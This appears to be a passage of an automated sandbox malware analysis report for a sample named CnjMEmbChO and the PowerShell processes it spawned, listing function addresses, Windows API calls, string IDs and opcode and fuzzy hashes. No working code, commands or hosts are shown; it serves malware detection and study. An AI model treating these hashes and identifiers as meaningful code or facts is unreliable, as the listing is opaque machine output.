                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@TextWindow$Length
                                                            • String ID:
                                                            • API String ID: 2308334395-0
                                                            • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                            • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                            • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                            • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                            Function 0040702A Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                            • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                            • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: CreateFontIndirectItemMessageObjectSend
                                                            • String ID:
                                                            • API String ID: 2001801573-0
                                                            • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                            • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                            • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                            • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                            Function 00401BA3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00401BA8
                                                            • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                            • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                            • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ClientScreen$ParentRectWindow
                                                            • String ID:
                                                            • API String ID: 2099118873-0
                                                            • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                            • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                            • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                            • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                            Function 00403C63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: _wtol
                                                            • String ID: GUIFlags$[G@
                                                            • API String ID: 2131799477-2126219683
                                                            • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                            • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                            • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                            • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                            Function 00402F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: ?O@
                                                            • API String ID: 1431749950-3511380453
                                                            • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                            • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                            • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                            • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                            Executed Functions

                                                            Function 050729F0 Relevance: .2, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.85556730815.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_5070000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b09597c05e30cb235a78419fd532a98b380bdd5b6ea4e603a6e933f4ecec1752
                                                            • Instruction ID: 33e754a49f486c336dbf1db83bf077315ffd37730384d0d984a75a54cda69e83
                                                            • Opcode Fuzzy Hash: b09597c05e30cb235a78419fd532a98b380bdd5b6ea4e603a6e933f4ecec1752
                                                            • Instruction Fuzzy Hash: F6918C74A0060A9FCB15CF59C494ABEF7B1FF89310B2482A9D815AB365C735FC51CBA4
                                                            Function 05072B00 Relevance: .1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.85556730815.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_5070000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0aa86006547875c5df42ab30a8fac82fb8a2cc9cf5cddf5f1e980a54e8382130
                                                            • Instruction ID: aa052f5a0346a3f7b286583847a323f6731ed9c35e33fd713f71b04d81e9806b
                                                            • Opcode Fuzzy Hash: 0aa86006547875c5df42ab30a8fac82fb8a2cc9cf5cddf5f1e980a54e8382130
                                                            • Instruction Fuzzy Hash: 5F411A74A0060A9FCB06CF49C598AAEF7B1FF48314B218159D815AB364C732FD51CBA4
                                                            Function 05072C7A Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.85556730815.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_5070000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3359357f69dec1518d6d9f307052435ef0a167dc6977bfb246b38a55c3cab82a
                                                            • Instruction ID: 6beead009003246289384eedf1032e658e4ff10a6c9bbcc685a9df1e034a19fa
                                                            • Opcode Fuzzy Hash: 3359357f69dec1518d6d9f307052435ef0a167dc6977bfb246b38a55c3cab82a
                                                            • Instruction Fuzzy Hash: 4721A1359093858FDB02CBA8D8A0AA97BB1FF4B324B1944C6C0554F2A3C732AC15CB56
                                                            Function 0338D01D Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.85555063316.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_338d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f0af5eee67afe5e5dac374ec58b897fd0494a52560e46a36551dcbb6a26c987
                                                            • Instruction ID: bf2c6afe72938865efffe3c4b654123d7b9af9f25d030bbeb570e5593673959f
                                                            • Opcode Fuzzy Hash: 2f0af5eee67afe5e5dac374ec58b897fd0494a52560e46a36551dcbb6a26c987
                                                            • Instruction Fuzzy Hash: E401F7B25043449EE7109F56CCC0B67FB9CDF42228F1CC45AEC544B682D27D9545CAB2
                                                            Function 0338D007 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.85555063316.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_338d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb8fc8ecbe03aa303fe60f8722a2da9949af33954a75c50c9ef46993754baa72
                                                            • Instruction ID: a32dd91a2347bd8cc479a6a10c77effad69eb60af8641204bdd7631ee5a66d33
                                                            • Opcode Fuzzy Hash: cb8fc8ecbe03aa303fe60f8722a2da9949af33954a75c50c9ef46993754baa72
                                                            • Instruction Fuzzy Hash: A601007250D3C05ED7128B258C94B52BFB4DF57224F1D81DBD9948F2A3C2699849C772

                                                            Executed Functions

                                                            Function 0734188D Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $rm$$rm
                                                            • API String ID: 0-1479975812
                                                            • Opcode ID: 326b8f810e1c26b59a1e7a8b5087fd9682f519b8038e3e5e98ef5e40cd47c0b4
                                                            • Instruction ID: 31c3cd9192106e5e71d42b5e36cfcf91b82c00d453772861d234b78b999daf33
                                                            • Opcode Fuzzy Hash: 326b8f810e1c26b59a1e7a8b5087fd9682f519b8038e3e5e98ef5e40cd47c0b4
                                                            • Instruction Fuzzy Hash: 10419EF1F446099BF72C97B898107AAB7D3DFC6210B1480AAD4599F355CA32EC81C7E6
                                                            Function 045529F0 Relevance: .2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85557570651.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_4550000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ff2d28061ce28c2e93ef6682fa13d85920310defa63101c9d4544fc259201c4e
                                                            • Instruction ID: 102d2d97f5bb4cbd6c78174e11cc6b2f156dd0fd0b7fa5b2fcb50aa6075cea0d
                                                            • Opcode Fuzzy Hash: ff2d28061ce28c2e93ef6682fa13d85920310defa63101c9d4544fc259201c4e
                                                            • Instruction Fuzzy Hash: D4915A74A006099FCB15CF98C494ABABBB1FF89310F24869AE815AB365C735FC51DF90
                                                            Function 04552B00 Relevance: .1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85557570651.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_4550000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c04e2d3eadd8bc5949f11d7ea0146f4f19f36d95dd35c0bf16c7ca2a4f94480
                                                            • Instruction ID: c384ddcbf4b7819679fc1a31ccd47f52ff08c2f212ed0d68db2bb40f234e9b25
                                                            • Opcode Fuzzy Hash: 0c04e2d3eadd8bc5949f11d7ea0146f4f19f36d95dd35c0bf16c7ca2a4f94480
                                                            • Instruction Fuzzy Hash: A9411974A006099FCB06CF58C598AAAF7B1FF48324F11819AE8159B365C732FD91DFA0
                                                            Function 04553C00 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85557570651.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_4550000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 312e7508f9b1b67373f31d872cbac9403d117d5f755b5f925100ea1190969f22
                                                            • Instruction ID: 130756a856755e204ba82b537e9ee5327910f3ba2553b42dafcbfe7354748369
                                                            • Opcode Fuzzy Hash: 312e7508f9b1b67373f31d872cbac9403d117d5f755b5f925100ea1190969f22
                                                            • Instruction Fuzzy Hash: F1215EB4A042198FCB00DF99C4909AABBB1FF89300B148496D819EB352C735FD41DBA1
                                                            Function 04552C70 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85557570651.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_4550000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be906e431b04237b89093e4887a265ba6e95b4c9c804d5655ccfeba0811df5d3
                                                            • Instruction ID: bb6b7ea7f1eb599a96c6bbf18c275de800f597fd90385d937a6ce604123018ce
                                                            • Opcode Fuzzy Hash: be906e431b04237b89093e4887a265ba6e95b4c9c804d5655ccfeba0811df5d3
                                                            • Instruction Fuzzy Hash: 9311B26950D3D16FD7078BA8D8702E87F716F83224B1944D7D4A0CF6B3C6266C4ADB62
                                                            Function 04553BF3 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85557570651.0000000004550000.00000040.00000800.00020000.00000000.sdmp, Offset: 04550000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_4550000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0da7042e0cab8053f03dd3c770f583f65f9691d64f1a0c4733cbc27297006073
                                                            • Instruction ID: 11685f483721736b636ff23f8651e4b6087c7f2c87764feae8a4eff3460f8fdd
                                                            • Opcode Fuzzy Hash: 0da7042e0cab8053f03dd3c770f583f65f9691d64f1a0c4733cbc27297006073
                                                            • Instruction Fuzzy Hash: 73211A74A042198FCB01DF9CD4909AABBB5FF89310B1485AAE819EB352C731FD41CBA1
                                                            Function 02D2D01D Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85556135404.0000000002D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2d2d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6febecd9bb3c3d1acabad2b04fa1ce59b0776f8e5b4408e265e4dd502b92fa95
                                                            • Instruction ID: 4eba45bb5282ade7c32444ab338060b9c78d123d389412326f197e829e3a4c9f
                                                            • Opcode Fuzzy Hash: 6febecd9bb3c3d1acabad2b04fa1ce59b0776f8e5b4408e265e4dd502b92fa95
                                                            • Instruction Fuzzy Hash: DC01F7725043509EE7204A56CE80B67FB99DF5222CF28C41AED944A352C379DD49CAB2
                                                            Function 02D2D005 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85556135404.0000000002D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2d2d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09cefea1b54fe2ce2cad3bf84a994829da461b3f962bedf7ce6970cede8bd950
                                                            • Instruction ID: 9c4530513fd11c579ce2d3e86604107374a2ca439ffb9f1549051cb519063047
                                                            • Opcode Fuzzy Hash: 09cefea1b54fe2ce2cad3bf84a994829da461b3f962bedf7ce6970cede8bd950
                                                            • Instruction Fuzzy Hash: 4F015E6250E3D05FE7128B258C94B52BFB4DF57228F2D80DBD9948F2A3C2699C49C772

                                                            Non-executed Functions

                                                            Function 07341168 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$$@r$$@r$$@r$Gm$Gm
                                                            • API String ID: 0-700421309
                                                            • Opcode ID: 6aa0f996a23e9d9d1319c1f14ee4203b2098a17cff847af9ed7019e03cab358a
                                                            • Instruction ID: e0244ae3f66244bb50c550ea3ff3ab25e5b44b4e2b97c85672e1e9ac27781fc6
                                                            • Opcode Fuzzy Hash: 6aa0f996a23e9d9d1319c1f14ee4203b2098a17cff847af9ed7019e03cab358a
                                                            • Instruction Fuzzy Hash: 5E5149B170470EDFFB298A68841076BBBE69FC6211F14857BC41DCB691CA72E8C1C7A1
                                                            Function 073406E8 Relevance: 6.4, Strings: 5, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: tP@r$tP@r$$@r$$@r$$@r
                                                            • API String ID: 0-667160924
                                                            • Opcode ID: eb622002982f7f2524ce9fcc518b85381cdfeab31976606943fb1bb1f1525f34
                                                            • Instruction ID: be68b63c1158471dc0baba47dcd8018551a30eae2eb9346f8458d209a132b162
                                                            • Opcode Fuzzy Hash: eb622002982f7f2524ce9fcc518b85381cdfeab31976606943fb1bb1f1525f34
                                                            • Instruction Fuzzy Hash: 27513DB27043558FE76D8669D500676BFE6EFC2220B1884FBD649CB352CA31EC41CBA1
                                                            Function 07342BDC Relevance: 5.1, Strings: 4, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: 73343a9b89a173aaeb83fdaec0fb7113cc91fbd2e27b8fa4b4be3bd4106af9c7
                                                            • Instruction ID: 795c5d43cfdfb1ddfdf171d5fc4921f0062a61670b9cf4eff022602d43c6d153
                                                            • Opcode Fuzzy Hash: 73343a9b89a173aaeb83fdaec0fb7113cc91fbd2e27b8fa4b4be3bd4106af9c7
                                                            • Instruction Fuzzy Hash: 72418FF27402029BFB39596844103BB77D2AFC7210F14447AE45AAF696CB31EC418796
                                                            Function 07340534 Relevance: 5.1, Strings: 4, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: fb2b2de7cf746636730b92fa102d674e2e2f214562e6127e34d9e6c38d4e67fc
                                                            • Instruction ID: e002c292eebb7eb543586234f1c6de5fd4ee13b314a5ba3f894b56ea701521b2
                                                            • Opcode Fuzzy Hash: fb2b2de7cf746636730b92fa102d674e2e2f214562e6127e34d9e6c38d4e67fc
                                                            • Instruction Fuzzy Hash: 49412AF1B04202ABFB2D566844103BA77D6DFD6210F1444FAC61B8F696DA79D841CBA2
                                                            Function 07341A34 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: 941f5ce3111f8af116bf5ca2a0da7693ccf098449ab02486371d155c5fa2cc99
                                                            • Instruction ID: c79182d3e084e6d4a296972ff9b915502e78e344f6b554fa78710920f4290b85
                                                            • Opcode Fuzzy Hash: 941f5ce3111f8af116bf5ca2a0da7693ccf098449ab02486371d155c5fa2cc99
                                                            • Instruction Fuzzy Hash: CE317BF3B0460A9BFB2D566844103B6B7D29FD6210F1484BAC5298F395EB36ECC1C792
                                                            Function 0734356C Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: 3861bbe6432936f2a158c36f7f47502bc1a04d8ceb8475c8592c6004e9117864
                                                            • Instruction ID: 15a779f413ec7a70f239a4c067f84763b8897fa98e14a4c4da7c776bda49844d
                                                            • Opcode Fuzzy Hash: 3861bbe6432936f2a158c36f7f47502bc1a04d8ceb8475c8592c6004e9117864
                                                            • Instruction Fuzzy Hash: FF314AF1B00303BBF72D5668445037A7BD68FD6111F1588BAC41DAF395DB39E8418B62
                                                            Function 073408F4 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: a07315ad10ca993046cf2a384f066db9059efb8171432e2a6692cfed133011f9
                                                            • Instruction ID: 0ee24750ac49e07bab40aafae6ffb46daf3cd0ea78a6427e65bf355a5a967890
                                                            • Opcode Fuzzy Hash: a07315ad10ca993046cf2a384f066db9059efb8171432e2a6692cfed133011f9
                                                            • Instruction Fuzzy Hash: BB317BF2B14202ABF72C5568481077AB3D29BD6210F1484FAC6598F3A5DA35EC41C7A2
                                                            Function 0734157C Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
                                                            • Opcode ID: 742f1ed0bbd84fa668f55e74ea84c0593e308ca350e188a37e5bb0048c918d79
                                                            • Instruction ID: 6436856e364c0a9fae1259ff95e47260782f9bc0328b5757c7b65e2d46644500
                                                            • Opcode Fuzzy Hash: 742f1ed0bbd84fa668f55e74ea84c0593e308ca350e188a37e5bb0048c918d79
                                                            • Instruction Fuzzy Hash: CA31F8F5B1460AABFB2D966C81103E6B7D69FC7111F1844FAC41A8F290DB39E8C1C766
                                                            Function 073432A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@r$$@r$$@r$$@r
                                                            • API String ID: 0-3687773554
                                                            • Opcode ID: 2f56b2d946bd402bd7f8ce0690e2a9e9b8f627138ff4407c85122f1e71f5ff3d
                                                            • Instruction ID: 983a00e16e94001b7641a0090f45ab6925926af3047d276cc33852c8b276805c
                                                            • Opcode Fuzzy Hash: 2f56b2d946bd402bd7f8ce0690e2a9e9b8f627138ff4407c85122f1e71f5ff3d
                                                            • Instruction Fuzzy Hash: CD2102B2314302ABFB7C556A8911B6BB2DB9BC5611F24847AD509AB3C9CE73EC408261
                                                            Function 07340C14 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.85574113350.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_7340000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'@r$4'@r$Gm$Gm
                                                            • API String ID: 0-920711070
